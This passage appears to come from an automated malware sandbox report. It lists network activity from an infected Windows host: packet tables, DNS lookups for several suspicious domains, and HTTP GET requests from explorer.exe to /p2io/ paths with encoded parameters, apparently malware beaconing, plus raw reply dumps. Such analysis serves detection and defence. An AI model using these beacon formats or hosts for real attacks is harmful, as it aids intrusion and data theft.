                                                        Jun 10, 2021 17:59:41.823045969 CEST8049768151.106.118.75192.168.2.4
                                                        Jun 10, 2021 17:59:41.823162079 CEST4976880192.168.2.4151.106.118.75
                                                        Jun 10, 2021 17:59:45.087789059 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.422576904 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.422744989 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.423042059 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.758968115 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760066986 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760092020 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:45.760278940 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:45.760420084 CEST4976980192.168.2.4163.43.122.119
                                                        Jun 10, 2021 17:59:46.095366955 CEST8049769163.43.122.119192.168.2.4
                                                        Jun 10, 2021 17:59:50.854814053 CEST4977080192.168.2.4104.21.65.7
                                                        Jun 10, 2021 17:59:50.897439957 CEST8049770104.21.65.7192.168.2.4
                                                        Jun 10, 2021 17:59:50.897545099 CEST4977080192.168.2.4104.21.65.7
                                                        Jun 10, 2021 17:59:50.897965908 CEST4977080192.168.2.4104.21.65.7
                                                        Jun 10, 2021 17:59:50.943380117 CEST8049770104.21.65.7192.168.2.4
                                                        Jun 10, 2021 17:59:50.956264973 CEST8049770104.21.65.7192.168.2.4
                                                        Jun 10, 2021 17:59:50.956310987 CEST8049770104.21.65.7192.168.2.4
                                                        Jun 10, 2021 17:59:50.956661940 CEST4977080192.168.2.4104.21.65.7
                                                        Jun 10, 2021 17:59:50.956813097 CEST4977080192.168.2.4104.21.65.7
                                                        Jun 10, 2021 17:59:51.001125097 CEST8049770104.21.65.7192.168.2.4
                                                        Jun 10, 2021 17:59:56.066492081 CEST4977180192.168.2.4192.169.223.13
                                                        Jun 10, 2021 17:59:56.257472038 CEST8049771192.169.223.13192.168.2.4
                                                        Jun 10, 2021 17:59:56.257592916 CEST4977180192.168.2.4192.169.223.13
                                                        Jun 10, 2021 17:59:56.257801056 CEST4977180192.168.2.4192.169.223.13
                                                        Jun 10, 2021 17:59:56.448759079 CEST8049771192.169.223.13192.168.2.4
                                                        Jun 10, 2021 17:59:56.448992014 CEST4977180192.168.2.4192.169.223.13
                                                        Jun 10, 2021 17:59:56.449057102 CEST4977180192.168.2.4192.169.223.13
                                                        Jun 10, 2021 17:59:56.639985085 CEST8049771192.169.223.13192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 10, 2021 17:57:46.487735987 CEST6529853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:46.557106018 CEST53652988.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:47.958292961 CEST5912353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:48.009334087 CEST53591238.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:48.288878918 CEST5453153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:48.369276047 CEST53545318.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:49.118768930 CEST4971453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:49.168771029 CEST53497148.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:49.832945108 CEST5802853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:49.893295050 CEST53580288.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:50.253917933 CEST5309753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:50.305176973 CEST53530978.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:51.386522055 CEST4925753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:51.439377069 CEST53492578.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:52.502564907 CEST6238953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:52.552805901 CEST53623898.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:53.608962059 CEST4991053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:53.662264109 CEST53499108.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:54.890736103 CEST5585453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:54.943711996 CEST53558548.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:55.792382956 CEST6454953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:55.844660997 CEST53645498.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:56.942357063 CEST6315353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:56.992871046 CEST53631538.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:57.749197960 CEST5299153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:57.799285889 CEST53529918.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:58.786149025 CEST5370053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:58.836502075 CEST53537008.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:57:59.636758089 CEST5172653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:57:59.686780930 CEST53517268.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:00.548912048 CEST5679453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:00.604336977 CEST53567948.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:01.433203936 CEST5653453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:01.492600918 CEST53565348.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:02.619153976 CEST5662753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:02.671348095 CEST53566278.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:03.985651016 CEST5662153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:04.071894884 CEST53566218.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:04.954133987 CEST6311653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:05.006649017 CEST53631168.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:05.788516045 CEST6407853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:05.840137959 CEST53640788.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:06.840332031 CEST6480153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:06.890369892 CEST53648018.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:18.230130911 CEST6172153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:18.306412935 CEST53617218.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:38.895137072 CEST5125553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:39.032160997 CEST53512558.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.074192047 CEST6152253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.242304087 CEST53615228.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.620681047 CEST5233753192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.694768906 CEST5504653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:40.698304892 CEST53523378.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:40.757975101 CEST53550468.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:41.253323078 CEST4961253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:41.314955950 CEST53496128.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:42.085366011 CEST4928553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:42.148837090 CEST53492858.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:43.184974909 CEST5060153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:43.237965107 CEST53506018.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:44.274621010 CEST6087553192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:44.427468061 CEST53608758.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:45.288420916 CEST5644853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:45.342664003 CEST53564488.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:46.649956942 CEST5917253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:46.713717937 CEST53591728.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:48.234550953 CEST6242053192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:48.296334982 CEST53624208.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:49.085917950 CEST6057953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:49.145890951 CEST53605798.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:58:58.618691921 CEST5018353192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:58:58.681042910 CEST53501838.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:21.936187029 CEST6153153192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:22.102794886 CEST53615318.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:27.751991987 CEST4922853192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:27.827166080 CEST53492288.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:31.289874077 CEST5979453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:31.358530045 CEST53597948.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:32.912105083 CEST5591653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:32.972131968 CEST53559168.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:33.123146057 CEST5275253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:33.205077887 CEST53527528.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:38.369435072 CEST6054253192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:38.737392902 CEST53605428.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:44.536937952 CEST6068953192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:45.085048914 CEST53606898.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:50.787945986 CEST6420653192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:50.853202105 CEST53642068.8.8.8192.168.2.4
                                                        Jun 10, 2021 17:59:55.995110035 CEST5090453192.168.2.48.8.8.8
                                                        Jun 10, 2021 17:59:56.064225912 CEST53509048.8.8.8192.168.2.4
                                                        Jun 10, 2021 18:00:01.465610027 CEST5752553192.168.2.48.8.8.8
                                                        Jun 10, 2021 18:00:01.821636915 CEST53575258.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jun 10, 2021 17:59:21.936187029 CEST192.168.2.48.8.8.80xbaa6Standard query (0)www.hiddenwholesale.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.751991987 CEST192.168.2.48.8.8.80xa757Standard query (0)www.anewdistraction.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.123146057 CEST192.168.2.48.8.8.80x88aaStandard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.369435072 CEST192.168.2.48.8.8.80xc537Standard query (0)www.biztekno.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:44.536937952 CEST192.168.2.48.8.8.80x8971Standard query (0)www.69-1hn7uc.netA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.787945986 CEST192.168.2.48.8.8.80x9293Standard query (0)www.cyrilgraze.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:55.995110035 CEST192.168.2.48.8.8.80xb3bcStandard query (0)www.centergolosinas.comA (IP address)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.465610027 CEST192.168.2.48.8.8.80x9f6Standard query (0)www.adultpeace.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)www.hiddenwholesale.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:22.102794886 CEST8.8.8.8192.168.2.40xbaa6No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)www.anewdistraction.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:27.827166080 CEST8.8.8.8192.168.2.40xa757No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.205077887 CEST8.8.8.8192.168.2.40x88aaNo error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:33.205077887 CEST8.8.8.8192.168.2.40x88aaNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.737392902 CEST8.8.8.8192.168.2.40xc537No error (0)www.biztekno.combiztekno.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:38.737392902 CEST8.8.8.8192.168.2.40xc537No error (0)biztekno.com151.106.118.75A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:45.085048914 CEST8.8.8.8192.168.2.40x8971No error (0)www.69-1hn7uc.net163.43.122.119A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.853202105 CEST8.8.8.8192.168.2.40x9293No error (0)www.cyrilgraze.com104.21.65.7A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:50.853202105 CEST8.8.8.8192.168.2.40x9293No error (0)www.cyrilgraze.com172.67.138.177A (IP address)IN (0x0001)
                                                        Jun 10, 2021 17:59:56.064225912 CEST8.8.8.8192.168.2.40xb3bcNo error (0)www.centergolosinas.comcentergolosinas.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 17:59:56.064225912 CEST8.8.8.8192.168.2.40xb3bcNo error (0)centergolosinas.com192.169.223.13A (IP address)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.821636915 CEST8.8.8.8192.168.2.40x9f6No error (0)www.adultpeace.comadultpeace.comCNAME (Canonical name)IN (0x0001)
                                                        Jun 10, 2021 18:00:01.821636915 CEST8.8.8.8192.168.2.40x9f6No error (0)adultpeace.com163.44.239.73A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.hiddenwholesale.com
                                                        • www.anewdistraction.com
                                                        • www.cleanxcare.com
                                                        • www.biztekno.com
                                                        • www.69-1hn7uc.net
                                                        • www.cyrilgraze.com
                                                        • www.centergolosinas.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.44976344.227.65.24580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:22.523107052 CEST3666OUTGET /p2io/?xN6x=es7Y2j6d/8vbylETtmEK+cycNhd4T49F/A456A8m/a4HPEjAATL8KRpgCeYlIlfO3VWH&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.hiddenwholesale.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:22.729955912 CEST3667INHTTP/1.1 307 Temporary Redirect
                                                        Server: openresty
                                                        Date: Thu, 10 Jun 2021 15:59:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 168
                                                        Connection: close
                                                        Location: http://hiddenwholesale.com
                                                        X-Frame-Options: sameorigin
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>
                                                        Jun 10, 2021 17:59:22.936537981 CEST3667INHTTP/1.1 307 Temporary Redirect
                                                        Server: openresty
                                                        Date: Thu, 10 Jun 2021 15:59:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 168
                                                        Connection: close
                                                        Location: http://hiddenwholesale.com
                                                        X-Frame-Options: sameorigin
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449764198.185.159.14480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 10, 2021 17:59:27.964210987 CEST3668OUTGET /p2io/?xN6x=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwAHOv6iOkY&YluDM=Ofc4YV0pThsp HTTP/1.1
                                                        Host: www.anewdistraction.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jun 10, 2021 17:59:28.103754044 CEST3669INHTTP/1.1 400 Bad Request
                                                        Cache-Control: no-cache, must-revalidate
                                                        Content-Length: 77564
                                                        Content-Type: text/html; charset=UTF-8
                                                        Date: Thu, 10 Jun 2021 15:59:28 UTC
                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                        Pragma: no-cache
                                                        Server: Squarespace
                                                        X-Contextid: XwfQswqc/7LuuUOoE
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                        Jun 10, 2021 17:59:28.103806973 CEST3671INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                        Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                        Jun 10, 2021 17:59:28.103830099 CEST3672INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                        Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                        Jun 10, 2021 17:59:28.103847027 CEST3672INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                        Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                        Jun 10, 2021 17:59:28.103867054 CEST3674INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                        Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                        Jun 10, 2021 17:59:28.103885889 CEST3675INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                        Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
